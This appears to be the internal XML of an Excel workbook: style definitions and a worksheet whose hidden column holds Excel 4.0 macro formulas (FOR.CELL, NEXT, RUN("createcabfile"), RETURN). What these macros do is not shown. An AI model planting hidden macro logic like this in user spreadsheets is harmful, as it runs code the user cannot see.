    <xf numFmtId="0" fontId="3" fillId="0" borderId="5" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="5" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="2" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="3" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="4" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>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3" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFi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3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1"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11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="181" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="17" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="17"/>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="17" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" shrinkToFi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_ET_STYLE_NoName_00_" xfId="17"/>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3" xfId="50"/>
    <cellStyle name="常规_机器设备评估明细表" xfId="51"/>
    <cellStyle name="样式 1" xfId="52"/>
  </cellStyles>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2"/>
  <colors>
    <mruColors>
      <color rgb="00FF0000"/>
      <color rgb="00FFFF00"/>
      <color rgb="0092D050"/>
      <color rgb="00000000"/>
    </mruColors>
  </color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haredStrings" Target="sharedStrings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="style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C142"/>
  <sheetViews>
    <sheetView showFormulas="1" topLeftCell="G1" workbookViewId="0">
      <selection activeCell="F1" sqref="A1:F16384"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="19.25" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" style="232" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="233" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="9" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="A1">
        <v>0</v>
      </c>
      <c r="B1" s="234" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="233" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="1:3">
      <c r="A2" t="b">
        <f>FOR.CELL("Counter",C1:C88,TRUE)</f>
        <v>0</v>
      </c>
      <c r="B2" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C2" s="233" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" ht="15.75" spans="1:3">
      <c r="A3">
        <v>9</v>
      </c>
      <c r="B3" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="235" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="1:3">
      <c r="A4" t="b">
        <f>NEXT()</f>
        <v>0</v>
      </c>
      <c r="B4" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C4" s="233" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="1:3">
      <c r="A5">
        <v>0</v>
      </c>
      <c r="B5" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C5" s="233" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:3">
      <c r="A6" t="b">
        <v>1</v>
      </c>
      <c r="B6" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C6" s="233" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="1:3">
      <c r="A7" t="b">
        <f>RUN("createcabfile",FALSE)</f>
        <v>0</v>
      </c>
      <c r="B7" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C7" s="233" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="1:3">
      <c r="A8" t="b">
        <f>RETURN()</f>
        <v>0</v>
      </c>
      <c r="B8" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C8" s="233" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="9" spans="2:3">
      <c r="B9" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C9" s="233" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="10" ht="15.75" spans="2:3">
      <c r="B10" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C10" s="235" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="11" ht="15.75" spans="2:3">
      <c r="B11" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C11" s="235" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="12" ht="15.75" spans="2:3">
      <c r="B12" s="234" t="s">
        <v>2</v>
      </c>
      <c r="C12" s="235" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="13" spans="2:3">
      <c r="B13" s="234" t="s">
        <v>14</v>
      </c>
      <c r="C13" s="233" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="14" ht="15.75" spans="2:3">
      <c r="B14" s="234" t="s">
        <v>16</v>
      </c>
      <c r="C14" s="235" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" ht="15.75" spans="2:3">
      <c r="B15" s="234" t="s">
        <v>17</v>
      </c>
      <c r="C15" s="235" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" ht="15.75" spans="2:3">
      <c r="B16" s="234" t="s">
        <v>19</v>
      </c>
      <c r="C16" s="235" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="17" ht="15.75" spans="2:3">
      <c r="B17" s="234" t="s">
        <v>20</v>
      </c>
      <c r="C17" s="235" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="18" ht="15.75" spans="2:3">
      <c r="B18" s="234" t="s">
        <v>22</v>
      </c>
      <c r="C18" s="235" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="19" ht="15.75" spans="2:3">
      <c r="B19" s="234" t="s">
        <v>24</v>
      </c>
      <c r="C19" s="235" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="20" ht="15.75" spans="2:3">
      <c r="B20" s="234" t="s">
        <v>25</v>
      </c>
      <c r="C20" s="235" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="21" spans="2:3">
      <c r="B21" s="234" t="s">
        <v>26</v>
      </c>
      <c r="C21" s="233" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="22" spans="2:3">
      <c r="B22" s="234" t="s">
        <v>28</v>
      </c>
      <c r="C22" s="233" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="23" ht="15.75" spans="2:3">
      <c r="B23" s="234" t="s">
        <v>30</v>
      </c>
      <c r="C23" s="235" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="24" ht="15.75" spans="2:3">
      <c r="B24" s="234" t="s">
        <v>32</v>
      </c>
      <c r="C24" s="235" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="25" spans="2:3">
      <c r="B25" s="234" t="s">
        <v>34</v>
      </c>
      <c r="C25" s="233" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="26" ht="15.75" spans="2:3">
      <c r="B26" s="234" t="s">
        <v>36</v>
      </c>
      <c r="C26" s="235" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="27" ht="15.75" spans="2:3">
      <c r="B27" s="234" t="s">
        <v>38</v>
      </c>
      <c r="C27" s="235" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="28" ht="15.75" spans="2:3">
      <c r="B28" s="234" t="s">
        <v>40</v>
      </c>
      <c r="C28" s="235" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="29" ht="15.75" spans="2:3">
      <c r="B29" s="234" t="s">
        <v>42</v>
      </c>
      <c r="C29" s="235" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="30" ht="15.75" spans="2:3">
      <c r="B30" s="234" t="s">
        <v>44</v>
      </c>
      <c r="C30" s="235" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="31" ht="15.75" spans="2:3">
      <c r="B31" s="234" t="s">
        <v>46</v>
      </c>
      <c r="C31" s="235" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="32" ht="15.75" spans="2:3">
      <c r="B32" s="234" t="s">
        <v>48</v>
      </c>
      <c r="C32" s="235" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="33" ht="15.75" spans="2:3">
      <c r="B33" s="234" t="s">
        <v>50</v>
      </c>
      <c r="C33" s="235" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="34" ht="15.75" spans="2:3">
      <c r="B34" s="234" t="s">
        <v>52</v>
      </c>
      <c r="C34" s="235" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="35" spans="2:3">
      <c r="B35" s="234" t="s">
        <v>54</v>
      </c>
      <c r="C35" s="233" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="36" ht="15.75" spans="2:3">
      <c r="B36" s="234" t="s">
        <v>55</v>
      </c>
      <c r="C36" s="235" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="37" spans="2:3">
      <c r="B37" s="234" t="s">
        <v>57</v>
      </c>
      <c r="C37" s="233" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="38" spans="2:3">
      <c r="B38" s="234" t="s">
        <v>59</v>
      </c>
      <c r="C38" s="233" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="39" spans="2:3">
      <c r="B39" s="234" t="s">
        <v>61</v>
      </c>
      <c r="C39" s="233" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="40" spans="2:3">
      <c r="B40" s="234" t="s">
        <v>63</v>
      </c>
      <c r="C40" s="233" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="41" spans="2:3">
      <c r="B41" s="234" t="s">
        <v>65</v>
      </c>
      <c r="C41" s="233" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="42" spans="2:3">
      <c r="B42" s="234" t="s">
        <v>67</v>
      </c>
      <c r="C42" s="233" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="43" ht="15.75" spans="2:3">
      <c r="B43" s="234" t="s">
        <v>69</v>
      </c>
      <c r="C43" s="235" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="44" ht="15.75" spans="2:3">
      <c r="B44" s="234" t="s">
        <v>71</v>
      </c>
      <c r="C44" s="235" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="45" ht="15.75" spans="2:3">
      <c r="B45" s="234" t="s">
        <v>73</v>
      </c>
      <c r="C45" s="235" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="46" spans="2:3">
      <c r="B46" s="234" t="s">
        <v>75</v>
      </c>
      <c r="C46" s="233" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="47" spans="2:3">
      <c r="B47" s="234" t="s">
        <v>77</v>
      </c>
      <c r="C47" s="233" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="48" spans="2:3">
      <c r="B48" s="234" t="s">
        <v>79</v>
      </c>
      <c r="C48" s="233" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="49" spans="2:3">
      <c r="B49" s="234" t="s">
        <v>81</v>
      </c>
      <c r="C49" s="233" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="50" spans="2:3">
      <c r="B50" s="234" t="s">
        <v>83</v>
      </c>
      <c r="C50" s="233" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="51" ht="15.75" spans="2:3">
      <c r="B51" s="234" t="s">
        <v>85</v>
      </c>
      <c r="C51" s="235" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="52" ht="15.75" spans="2:3">
      <c r="B52" s="234" t="s">
        <v>87</v>
      </c>
      <c r="C52" s="233" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="53" ht="15.75" spans="2:3">
      <c r="B53" s="234" t="s">
        <v>89</v>
      </c>
      <c r="C53" s="235" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="54" ht="15.75" spans="2:3">
      <c r="B54" s="234" t="s">
        <v>91</v>
      </c>
      <c r="C54" s="235" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="55" ht="15.75" spans="2:3">
      <c r="B55" s="234" t="s">
        <v>93</v>
      </c>
      <c r="C55" s="235" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="56" ht="15.75" spans="2:3">
      <c r="B56" s="234" t="s">
        <v>95</v>
      </c>
      <c r="C56" s="235" t="s">
        <v>96</v>
      </c>
    </row>
